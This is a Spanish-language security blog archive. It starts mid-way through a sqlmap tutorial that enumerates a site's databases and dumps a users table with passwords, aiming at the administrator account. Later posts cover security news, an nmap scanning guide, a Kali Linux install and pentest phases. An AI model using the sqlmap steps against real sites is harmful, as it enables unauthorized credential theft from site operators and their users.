[02:08:53] [INFO] the back-end DBMS is MySQL

web application technology: Apache
back-end DBMS: MySQL 5.0
[02:08:53] [INFO] fetching database names
[02:08:54] [INFO] the SQL query used returns 2 entries
[02:08:55] [INFO] retrieved: "information_schema"
[02:08:57] [INFO] retrieved: "pepito"
available databases [2]:
[*] pepito
[*] information_schema

[02:08:57] [INFO] Fetched data logged to text files under '/opt/pentest/database/sqlmap/output/www.pepito.com'

[*] shutting down at 02:08:57


Bien, la base de datos que nos interesa es pepito (la vuestra se llamara de otra manera XD). De ella obtendremos primero las tablas que la componen y luego las columnas (y sus datos).
Para conseguir ver las tablas, introducimos.

sqlmap -u (WEB) -D pepito --tables

ejemplo sqlmap.py -u http://www.pepito.com/index.php?id=1 -D pepito --tables

Con -D Le indicamos la base de datos a utilizar (-Database) y con --tables que nos muestre las tablas disponibles.

Una vez más, en pocos segundos nos dumpea las tablas:

4

Ok, como nosotros queremos ver los usuarios del sitio o del panel de control la tabla que nos interesa es la de users. Vamos a dumpear esa tabla.

Si primero nos interesa ver que columnas tiene y de ahí obtener una consulta personalizada hacemos:

sqlmap -u (WEB) -T users --columns

ejemplo: sqlmap -u http://www.pepito.com/categoria.php?id=1 -T users --columns

Database: pepito
Table: users
[8 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| ciudad | varchar(100) |
| clave | varchar(15) |
| email | varchar(80) |
| estado | char(1) |
| id | int(11) |
| id_provincia | int(11) |
| localidad | varchar(100) |
| usuario | varchar(15) |
+--------------+--------------+


Bueno, de otro modo si querés todo el contenido de la tabla:

sqlmap -u (URL) -T users --dump

ejem: sqlmap -u http://www.pepito.com/categoria.php?id=1 -T users --dump

Este proceso puede demorar si la tabla tiene muchas entradas. Podemos agilizar esto usando el flag --threads=n donde n es un numero no mayor a 10. OJO!! Si el servidor tiene un firewall configurado como debe ser, puede que nos banee la IP por tantas conexiones simultaneas.

Luego de unos minutos...

Imagen

Con esto terminamos con sqlmap, como podéis ver, se han sacado muchas cuentas con sus usuarios y contraseñas, y si pillas la del administrador, Puff!!!
Hasta otra, Comenten cualquier duda!!

-Guía realizada para medios educativos, no me hago responsable del mal uso


jueves, 24 de abril de 2014

Mozilla ofrece una recompensa de 10.000 dólares a quien encuentre errores en ...

Mozilla ofrece una recompensa especial de 10.000 dólares a quien encuentre errores en la versión Nightly de Firefox 31, cuya versión final está prevista que sea lanzada el próximo 31 de julio. Además, han anunciado una nueva librería de verificación de certificados para Gecko, el motor desarrollado por la Fundación Mozilla.

Mozilla ha anunciado una recompensa de 10.000 dólares para aquel o aquellos que encuentren errores en la versión Nightly de Firefox 31 y cuya versión final está prevista que sea lanzada el próximo 31 de julio. Las condiciones que debe presentar el error son muy concretas, pero en el caso de encontrar cualquier error, que cumpla alguno de los requisitos, Mozilla pagará hasta 3.000 dólares como recompensa. Al mismo tiempo, han anunciado en su blog oficial una nueva librería de verificación de certificados para su motor Gecko, utilizado en varias aplicaciones como los navegadores Firefox o Thunderbird, y que soporta varios estándares de Internet como son HTML o javascript.

Los virus “vienen del Este”

Haciendo un paralelismo con la propaganda antisoviética de los años 50, hoy el peligro para la libertad proviene de los virus y del malware que procede principalmente del Este europeo y de China. Los datos son relevantes, un 49% de los ataques puede ser atribuido a China y el este de Asia, seguidos por Europa del este con un 21%.

Los ataques cibernéticos con propósitos de espionaje están creciendo con fuerza a nivel global y grupos o gobiernos del este de Europa están desempeñando un papel relevante en este sentido, según uno de los estudios anuales más amplios sobre violaciones informáticas.
Las actividades de espionaje cibernético a nivel global en 2013 fueron atribuibles a residentes de China y otras naciones del este de Asia en un 49% de las ocasiones, pero en los países del este de Europa, especialmente en las naciones de habla rusa, han aumentado este tipo de delitos hasta alcanzar el 21% de las violaciones, dijo Verizon Communications en su informe anual de investigaciones de infracciones de datos.
Estas fueron por lejos las zonas más activas detectadas en la investigación, que extrajo más de la mitad de los datos de víctimas en Estados Unidos. Aproximadamente el 25% de los incidentes por espionaje no pueden ser atribuidos a ningún país, según los autores del informe.

Aunque el número global de incidentes de espionaje estudiados se triplicó a 511 frente al informe de Verizon de 2013, la mayor parte de ese incremento se debe a la suma de nuevas fuentes de datos.

Pero incluso aunque se hubiera estudiado el mismo número de fuentes que antes, los casos de espionaje crecieron, dijo el investigador de Verizon Bryan Sartin.

No todo el espionaje electrónico fue achacado a los gobiernos. Investigadores de firmas privadas y organismos públicos que contribuyen a los datos atribuyeron el 11% de los ataques de espionaje a delincuentes organizados y un 87% a gobiernos.

En algunos casos, las bandas criminales probablemente contemplaban vender la información a gobiernos o competidores de las víctimas. "Vemos una leve fusión entre el crimen organizado clásico y las bandas de espionaje", dijo Sartin, añadiendo que esperaba que esa tendencia continuara.

Un chico pierde al 'Call of Duty' y envía el SWAT a casa de su rival

"Acabo de matar a mi madre y voy a disparar a más personas", dijo el vencido cuando llamó a la policía y se hizo pasar por el otro usuario

Perdedor en 'Call of Duty' y venganza en el mundo real. Un jugador ha enviado este jueves a las fuerzas especiales del SWAT a casa del rival tras ser derrotado en el juego 'on line' 'Call of Duty'. La víctima, un chico de 17 años residente en Nueva York, derrotó a su enemigo, hasta ahora anónimo, en una disputada partida, según publica el New York Post.

El internauta vencido comunicó a la policía que había cometido un asesinato. "Acabo de matar a mi madre y voy a disparar a más personas", dijo en la llamada. Eso sí, haciéndose pasar por Rafael Castillo, nombre de la víctima. El mal perdedor rastreó la dirección IP de su rival y localizó la dirección de su casa antes de llamar a la policía.

La policía reaccionó a la llamada con urgencia. La situación que se encontraron los agentes cuando llegaron a la vivienda del presunto homicida no era la esperada: todo parecía normal. El chico estaba en su cuarto disfrutando aún del videojuego, su hermano acababa de llegar a casa y la madre preparaba la comida. No había presuntos asesinos por ninguna parte.

Una broma de mal gusto

En vista de la gravedad de la llamada, las fuerzas del orden enviaron varios coches de policía a la dirección, helicópteros, y prepararon un dispositivo que colapso el tráfico de la zona. Al final, un total de 60 agentes han sido movilizados, incluidos los miembros de la Unidad de Operaciones Especiales de Nassau. "Se han movilizado muchos recursos y se han causado problemas de tráfico. Al final resultó ser una broma", declaró la policía. Los cuerpos de seguridad aún no han podido localizar ni identificar al autor de la "inocentada".

FUENTE: http://www.elperiodico.com/es/noticias/sociedad/chico-pierde-call-duty-envia-swat-casa-rival-3257696

Guias nmap

nmap es una herramienta que sirve para la verificación de puertos en un sistema. aunque esta herramienta tiene muchas mas aplicaciones

Tipos de escaneos:



1) Escaneo de puertos sencillo, realiza una verificación por medio de un intento de conexión y dependiendo de la repuesta que muestre cada puerto, dice si esta habilitado o inhabilitado


nmap (Dirección IP)



2) Escaneo de puertos en modo oculto, activamos el comando -sS para hacer un escaneo sin dejar huellas. Así pues, consiste en terminar la conexión antes de que el "diálogo" con el host de destino esté completo.

ACK------- Abierto
RST------- Cerrado o inhabilitado


nmap -sS (Dirección IP)




En este ejemplo vemos que se esta realizando un intento de una conexión a cada uno de los puertos y como podemos ver algunos de estos puertos están "custodiados" por un Firewall

3) Escaneo por el protocolo UDP, solo escanea los puertos que tienen que ver con el puerto UDP ( -sU )


nmap -sU (Dirección IP)


4) Escaneo con ping, este escaneo mostrara todos los dispositivos conectados a la red-lan, escaneando las 255 direcciones de la red. El atributo -sP indica que sera un escaneo mediante ping. Envia un ping (ICMP echo request) y un paquete TCP ACK al puerto 80. Si el destino contesta con otro ping o con un paquete TCP RST significa que esta operativo.


nmap -sP (rango de IP)




5) Escaneo de detección del sistema operativo, determinar el sistema operativo respondiendo a ciertas secuencias TCP/IP. El atributo es -O


nmap -O (rango de IP)





6) Escaneo de servicios, este es uno de los pasos fundamentales para dar el salto al siguiente paso, ya teniendo la información de cada uno de los servicios uno podrá buscar exploits para
"explotar" vulnerabilidades ofrecidas por nuestro cliente.
El atributo para activar este tipo de escaneo es -sV






Fuente: http://comunidad.dragonjar.org/

Instalando Kali Linux

Hoy vamos a instalar Kali Linux en el ordenador, pero en vez de un arranque dual en una maquina virtual, ya que con maquina virtual podremos ejecutar kali desde el sistema anfitrión y tenemos la posibilidad de compartir carpetas

Empezamos por saber que es Kali., para los que no lo sepan:

Kali Linux es una distribución basada en Debian GNU/Linux diseñada principalmente para la auditoría y seguridad informática en general. Fue fundada y es mantenida por Offensive Security Ltd. Mati Aharoni and Devon Kearns, ambos pertenecientes al equipo de Offensive Security, desarrollaron la distribución a partir de la reescritura de BackTrack,que se podría denominar como la antecesora de Kali Linux.

Kali linux viene con un arsenal poderoso de programas basado en la auditoria y pruebas de penetración como escaner de puertos nmap, sniffers como wireshark, crackeadores de passwords como John the Ripper o hidra y diversos programas para explotar y buscar vulnerabilidades sea en un red-lan o fuera de ella.

Si no tenéis Virtual Box, descargarlo de: https://www.virtualbox.org/wiki/Downloads

- Descargamos Kali Linux:

Kali linux se puede descargar en este enlace: www.kali.org/downloads seleccionamos la arquitectura adecuada, yo elegiría 32Bit ya que aunque tengas un ordenador de 64, la version de 64 de kali me a dado algunos problemas, pero sois libres de elegir



Instalación

Inicia Virtual Box y crea una máquina virtual. Asegúrate de darle los recursos suficientes: 1G o 2G de RAM debe de ser suficiente, la memoria de almacenamiento yo puse unos 40Gb, lo demás déjalo por defecto. Si deseas instalar la versión de 64 bits tendrás que asegurarte de tener 2 procesadores en la máquina virtual.



Inicia la maquina virtual y selecciona la imagen ISO de Kali de tu pc, para que puedas arrancar desde él, elige “instalador gráfico” (Graphic Installer) y sigue las instrucciones del instalador. Para la mayoría de las personas la configuración predeterminada debe ser suficiente. Si no estás satisfecho pues elige lo que mas te convenga



Después inicia tu maquina con el usuario que hallas creado, aunque recomiendo como root para la actualización del sistema


- Errores después de la instalación, si no tienes sáltate este punto

Si te aparece este mensaje, y no te deja arrancar la maquina virtual:


Haz click derecho en la maquina virtual, ve a Configuración y luego Sistema, ve a la pestaña Procesador y habilita el PAE/NX


Arranca el sistema, no debería de volver a darte problemas

- Actualizar el sistema

Cuando estéis dentro de Kali, después de haberle instalado, abrid una terminal o consola de comandos y escribir este comando, siempre que querais actualizar el sistema

apt-get update && apt-get upgrade && apt-get install

Y con eso ya quedara actualizado al máximo hacerlo de vez en cuando (cada mes mas o menos)

- Instalando Guest Additions

Monta el CD de “Guest additions”. Ve al menú de Inicio -> Dispositivos -> Instalar Guest Additions. (Devices –> Install Guest Additions.)


kali_guest_add
Ignora el instalador automático que aparece al montar el CD.
- Copiar archivos a /root y cambia los permisos de archivos, escribiendo este comando:
cp /media/cd-rom/VBoxLinuxAdditions.run /root/ 

- luego

chmod 755 /root/VBoxLinuxAdditions.run
- Cambia al directorio /root y ejecuta el instalador, escribiendo este comando:
cd /root
Y después:
./VBoxLinuxAdditions.run


Kali_vm_open_vm_tools2

Reinicia kali linux, y a disfrutar!!, ya tienes kali actualizado al máximo, 100% operativo y con la posibilidad de ponerla en pantalla completa y de compartir carpetas con el sistema anfitrión!!

Espero que os halla gustado el tutorial de instalación, cualquier duda comenten

miércoles, 23 de abril de 2014

Seguridad informática y Pentest

Saber estos términos es muy importante para los que entran en este mundillo, por eso que mejor que explicarlos.

Empecemos por la seguridad informática:

La seguridad informática es una parte o área de la informática dedicado a la protección de la infraestructura computacional y todo lo relacionado con esta y, especialmente, la información contenida o circulante.

La seguridad informática comprende software (bases de datos, metadatos, archivos), hardware y todo lo que la organización valore (activo) y signifique un riesgo si esta información confidencial llega a manos de otras personas, convirtiéndose, por ejemplo, en información privilegiada.
Según Wikipedia

Bien, y que significa el termino "Pentest", y en que consiste:

Pentest significa test de penetración y consiste en pruebas ofensivas contra los mecanismos de defensa existentes en el entorno que se está analizando.
Estas pruebas comprenden desde el análisis de dispositivos físicos y digitales, hasta el análisis del factor humano utilizando Ingeniería Social.

¿Que partes tiene un Penetration-Test?

  • Fase de reconocimiento: Posiblemente, esta sea una de las etapas que más tiempo demande. Asimismo, se definen objetivos y se recopila toda la información posible que luego será utilizada a lo largo de las siguientes fases. La información que se busca abarca desde nombres y direcciones de correo de los empleados de la organización, hasta la topología de la red, direcciones IP, entre otros. Cabe destacar que el tipo de información o la profundidad de la pesquisa dependerán de los objetivos que se hayan fijado en la auditoría.
  • Fase de escaneo: Utilizando la información obtenida previamente se buscan posibles vectores de ataque. Esta etapa involucra el escaneo de puertos y servicios. Posteriormente se realiza el escaneo de vulnerabilidades que permitirá definir los vectores de ataque.
  • Fase de enumeración: El objetivo de esta etapa es la obtención de los datos referente a los usuarios, nombres de equipos, servicios de red, entre otros. A esta altura de la auditoría, se realizan conexiones activas con el sistema y se ejecutan consultas dentro del mismo.
  • Fase de acceso: En esta etapa finalmente se realiza el acceso al sistema. Esta tarea se logra a partir de la explotación de aquellas vulnerabilidades detectadas que fueron aprovechadas por el auditor para comprometer el sistema.
  • Fase de mantenimiento de acceso (Persistencia): Luego de haberse obtenido el acceso al sistema, se busca la manera de preservar el sistema comprometido a disposición de quien lo ha atacado. El objetivo es mantener el acceso al mencionado sistema perdurable en el tiempo

Un Pen-Test, no es tarea fácil y requiere de un conocimiento sólido y profundo de las tecnologías involucradas en los sistemas, aplicaciones y servicios, además de una óptica y experiencia amplia en el comportamiento de varios sistemas operativos. Mediante estas técnicas, el Black, White o Ethical Hacker puede descubrir vulnerabilidades en el sistema estudiado, y usarlas para obtener acceso al mismo, por lo que está técnica se diferencia entre otras cosas del “análisis de vulnerabilidades” en  que en este último una vez detectadas las vulnerabilidades no son usadas para penetrar el sistema.


Fuente: B1nary0

Bienvenidos al Hiddenploit

Hoy día de 23 de abril, inauguro mi blog dedicado a los temas de pentesting, seguridad informática, programación y guías, donde podrás encontrar todo lo que necesites para ampliar tus conocimientos, ya sea por tu trabajo, tus estudios o simplemente como hobby, del cual toda persona puede aprender, ya sea novata o con experiencia.

¡Bienvenidos!